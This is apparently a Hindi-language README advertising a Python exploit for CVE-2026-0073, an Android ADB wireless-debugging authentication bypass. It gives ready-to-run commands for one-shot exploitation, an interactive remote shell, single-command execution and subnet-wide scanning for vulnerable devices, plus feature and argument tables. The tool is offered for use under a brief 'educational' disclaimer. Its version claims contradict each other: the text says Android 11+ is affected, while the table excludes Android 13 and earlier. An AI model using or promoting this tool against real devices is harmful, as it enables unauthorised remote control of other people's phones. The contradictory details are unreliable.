
🚀 CVE-2026-0073 - Android ADB वायरलेस डिबगिंग एक्सप्लॉइट (CVSS 8.8) 🔓 ज़ीरो-क्लिक प्रमाणीकरण बाईपास TLS प्रकार भ्रम के माध्यम से। इंटरैक्टिव शेल प्राप्त करें, कमांड निष्पादित करें, नेटवर्क स्कैन करें। शैक्षणिक रेड-टीम उपकरण। 🐚⚡

शून्य-क्लिक | रिमोट शेल | नेटवर्क स्कैनर | शैक्षिक सुरक्षा अनुसंधान उपकरण
CVE-2026-0073 Android के ADB डेमॉन में एक महत्वपूर्ण प्रमाणीकरण बाईपास भेद्यता है जो Android 11+ उपकरणों पर वायरलेस डीबगिंग को प्रभावित करती है। दोष TLS प्रमाणपत्र सत्यापन तर्क में निहित है जहां EVP_PKEY_cmp() में एक टाइप कंफ्यूज़न हमलावरों को एक RSA कुंजी के साथ कॉन्फ़िगर किए गए उपकरण के विरुद्ध EC P-256 या Ed25519 प्रमाणपत्र प्रस्तुत करके प्रमाणीकरण को बायपास करने की अनुमति देता है।
यह PoC केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए भेद्यता प्रदर्शित करता है।
| Android संस्करण | प्रभावित |
|---|---|
| Android 14 | ✅ हाँ |
| Android 15 | ✅ हाँ |
| Android 16 | ✅ हाँ |
| Android 13- | ❌ नहीं |
पैच: Android Security Bulletin 2026-05-01
#Basic - One Shot Exploit
python exploit.py --target 192.168.1.100
#Interactive Shell
python exploit.py -t 192.168.1.100 -i
#Execute Single Command
python exploit.py -t 192.168.1.100 -c "id" -o result.txt
#Scan Entire Network
python exploit.py --scan --interface eth0
#Manual Port + Verbose
python exploit.py -t 192.168.1.100 -p 39311 -v
#Ed25519 Certificate
python exploit.py -t 192.168.1.100 --key-type ed25519
#Non-Interactive Mode (Exit After Command)
python exploit.py -t 192.168.1.100 -c "whoami" --no-interactive
मेरे अन्य एक्सप्लॉइट रिपॉजिटरी देखें:
| विशेषता | विवरण |
|---|
| 🔍 स्मार्ट पोर्ट खोज | स्वचालित रूप से 30000-50000 रेंज + सामान्य पोर्ट स्कैन करता है, CNXN हैंडशेक के माध्यम से ADB सत्यापित करता है |
| 🔐 TLS 1.3 बाईपास | EVP_PKEY_cmp() में टाइप कंफ्यूज़न का शोषण करता है प्रमाणीकरण बाईपास के लिए |
| 🎨 दोहरी कुंजी समर्थन | EC P-256 (डिफ़ॉल्ट) या Ed25519 प्रमाणपत्र |
| 🐚 इंटरैक्टिव शेल | थ्रेड-आधारित I/O के साथ पूर्ण टर्मिनल एक्सेस |
| ⚡ एकल कमांड मोड | एक कमांड निष्पादित करें और बाहर निकलें - स्क्रिप्टिंग के लिए उपयुक्त |
| 📡 नेटवर्क स्कैनर | भेद्य उपकरणों के लिए पूरे सबनेट को स्कैन करें |
| 🔄 ऑटो रीट्राय | एक्सपोनेंशियल बैकऑफ़ + कॉन्फ़िगरेबल अधिकतम पुनर्प्रयास |
| 🎯 मैनुअल पोर्ट ओवरराइड | जब ऑटो-डिस्कवरी विफल हो तो पोर्ट निर्दिष्ट करें |
| 📁 आउटपुट कैप्चर | कमांड परिणामों को फ़ाइल में सहेजें |
| 🎨 रंगीन आउटपुट | colorama के माध्यम से पेशेवर दृश्य फ़ीडबैक |
| 🪵 वर्बोज़ डीबग | समस्या निवारण के लिए विस्तृत लॉगिंग |
| 🔌 प्रॉक्सी समर्थन | HTTP/HTTPS प्रॉक्सी संगतता |
| 🧵 थ्रेडेड शेल | नॉन-ब्लॉकिंग इंटरैक्टिव सत्र |
| आर्गुमेंट | शॉर्ट | डिफ़ॉल्ट | विवरण |
|---|
--target | -t | None | लक्ष्य IP पता |
--port | -p | Auto | वायरलेस डीबगिंग पोर्ट |
--command | -c | None | एकल कमांड निष्पादित करें |
--output | -o | None | आउटपुट को फ़ाइल में सहेजें |
--verbose | -v | False | डीबग लॉगिंग सक्षम करें |
--interactive | -i | True | इंटरैक्टिव शेल मोड |
--no-interactive | - | False | कमांड निष्पादन के बाद बाहर निकलें |
--scan | - | False | भेद्य उपकरणों के लिए नेटवर्क स्कैन करें |
--interface | - | None | स्कैनिंग के लिए नेटवर्क इंटरफ़ेस |
--key-type | - | ec | प्रमाणपत्र प्रकार (ec या ed25519) |
--max-retries | - | 3 | अधिकतम पुनर्प्रयास प्रयास |
--no-auto-port | - | False | स्वचालित पोर्ट खोज अक्षम करें |